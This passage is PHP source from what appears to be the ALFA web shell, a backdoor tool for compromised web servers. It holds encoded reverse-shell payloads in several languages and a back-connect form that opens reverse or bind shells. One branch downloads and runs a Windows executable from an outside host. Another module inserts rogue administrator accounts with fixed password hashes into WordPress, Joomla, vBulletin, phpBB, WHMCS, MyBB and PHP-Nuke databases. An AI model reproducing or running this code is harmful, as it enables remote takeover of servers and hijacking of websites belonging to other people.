- $ruby = 'tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=';
- $node = 'nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==';
- $c = 'tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==';
- $java = 'lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D';
- echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
- echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
- <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
- $cbArr = array('php' => 'Php', 'perl' => 'Perl', 'python' => 'Python', 'ruby' => 'Ruby', 'c' => 'C', 'java' => 'Java', 'node' => 'NodeJs', 'bcwin' => 'Windows');
- foreach ($cbArr as $key => $val) {
- echo ("<option value='{$key}' " . ($GLOBALS['sys'] == 'win' ? 'selected' : '') . ">{$val}</option>");
- }
- echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
- if (isset($_POST['alfa1']) && !empty($_POST['alfa1'])) {
- $lang = $_POST['alfa1'];
- $ip = $_POST['alfa2'];
- $port = $_POST['alfa3'];
- $arg = ($_POST['alfa4'] == 'bind' ? $port : $port . ' ' . $ip);
- $tmpdir = ALFA_TEMPDIR;
- $name = $tmpdir . '/' . $lang . uniqid() . rand(1, 99999);
- $allow = array('perl', 'ruby', 'python', 'node');
- eval('$lan=$' . $lang . ';');
- if (in_array($lang, $allow)) {
- if (__write_file($name, __get_resource($lan))) {
- if (_alfa_can_runCommand(true, true)) {
- $os = ($GLOBALS['sys'] != 'win') ? '1>/dev/null 2>&1 &' : '';
- $out = alfaEx("$lang $name $arg $os");
- if ($out == '') {
- $out = "<font color='green'><center>[ Finished...! ]</center></font>";
- }
- echo ("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
- }
- } else {
- echo ("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
- }
- }
- if ($lang == 'java' || $lang == 'c') {
- $code = __get_resource($lan);
- $out = nl2br(bcinit($lang, $code, '', ''));
- echo ("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
- }
- if ($lang == 'bcwin') {
- $alfa = new AlfaCURL();
- $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
- $tmpdir = ALFA_TEMPDIR;
- $f = @fopen($tmpdir . '/bcwin.exe', 'w+');
- @fwrite($f, $s);
- @fclose($f);
- $out = alfaEx($tmpdir . '/bcwin.exe ' . $_POST['alfa2'] . ' ' . $_POST['alfa3']);
- }
- if ($lang == 'php') {
- echo "<pre class=ml1 style='margin-top:5px'>";
- $code = __get_resource($lan);
- if ($code !== false) {
- $code = "\$target = \"" . $arg . "\";
- " . $code;
- eval($code);
- echo ("<center><font color='green'>[ Finished...! ]</font></center>");
- }
- echo '</pre>';
- }
- }
- echo '</div>';
- alfafooter();
- }
- function alfapwchanger() {
- alfahead();
- echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
- <center><h3>';
- $vals = array('WordPress' => array('wp', 2), 'Joomla' => array('joomla', 3), 'vBulletin' => array('vb', 5), 'phpBB' => array('phpbb', 6), 'WHMCS' => array('whmcs', 7), 'MyBB' => array('mybb', 8), 'Php Nuke' => array('nuke', 9), 'Drupal' => array('drupal', 10), 'SMF' => array('smf', 11));
- Alfa_Create_A_Tag('pwchanger', $vals);
- echo '</h3></center>';
- if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'wp') {
- echo __pre() . '<center><center><div class="txtfont_header">| WordPress |</div>
- <p>' . getConfigHtml('wp') . '</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'mka7', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form>';
- if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
- $localhost = $_POST['alfa3'];
- $database = $_POST['alfa4'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'insert into ' . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'select ID from ' . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn));
- $sole = @mysqli_num_rows($solevisible);
- if ($sole == 1) {
- $solevis = @mysqli_fetch_assoc($solevisible);
- $res = $solevis['ID'];
- }
- $solevisible = @mysqli_query($conn, 'insert into ' . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla') {
- echo __pre() . '<center><center><div class="txtfont_header">| Joomla |</div><p><p>' . getConfigHtml('joomla') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa3'];
- $database = $_POST['alfa4'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'insert into ' . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'select id from ' . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn));
- $sole = @mysqli_num_rows($solevisible);
- if ($sole == 1) {
- $solevis = @mysqli_fetch_assoc($solevisible);
- $res = $solevis['id'];
- }
- $solevisible = @mysqli_query($conn, 'INSERT INTO ' . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb') {
- echo __pre() . '<center><center><div class="txtfont_header">| vBulletin |<div><p>' . getConfigHtml('vb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $prefix = $_POST['alfa7'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','" . date('Y-m-d') . "','" . time() . "')") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn));
- $sole = mysqli_num_rows($solevisible);
- if ($sole == 1) {
- $solevis = mysqli_fetch_assoc($solevisible);
- $res = $solevis['userid'];
- }
- $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','16744444')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if (isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb') {
- echo __pre() . '<center><div class="txtfont_header">| phpBB |</div><p><p>' . getConfigHtml('phpbb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $hash = md5('solevisible');
- $solevisible = @mysqli_query($conn, 'UPDATE ' . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'UPDATE ' . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'UPDATE ' . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'UPDATE ' . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'UPDATE ' . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if (isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs') {
- echo __pre() . '<center><div class="txtfont_header">| Whmcs |</div><p><p>' . getConfigHtml('whmcs') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa5'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if (isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb') {
- echo __pre() . '<center><div class="txtfont_header">| Mybb |</div><p><p>' . getConfigHtml('mybb') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'mka7', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa5'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $solevisible = @mysqli_query($conn, 'insert into ' . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if (isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke') {
- echo __pre() . '<center><div class="txtfont_header">| PhpNuke |</div><p><p>' . getConfigHtml('phpnuke') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'mka7', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'mka7@pay-moon.com', 'inputSize' => '50'));
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
- $localhost = $_POST['alfa2'];
- $database = $_POST['alfa3'];
- $username = $_POST['alfa4'];
- $password = $_POST['alfa5'];
- $admin = $_POST['alfa7'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
- $hash = md5($pwd);
- $solevisible = @mysqli_query($conn, 'insert into ' . $prefix . "_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
- if ($solevisible) {
- __alert('Success... ' . $admin . ' is created...');
- }
- }
- }
- if (isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal') {
- echo __pre() . '<center><div class="txtfont_header">| Drupal |</div><p><p>' . getConfigHtml('drupal') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
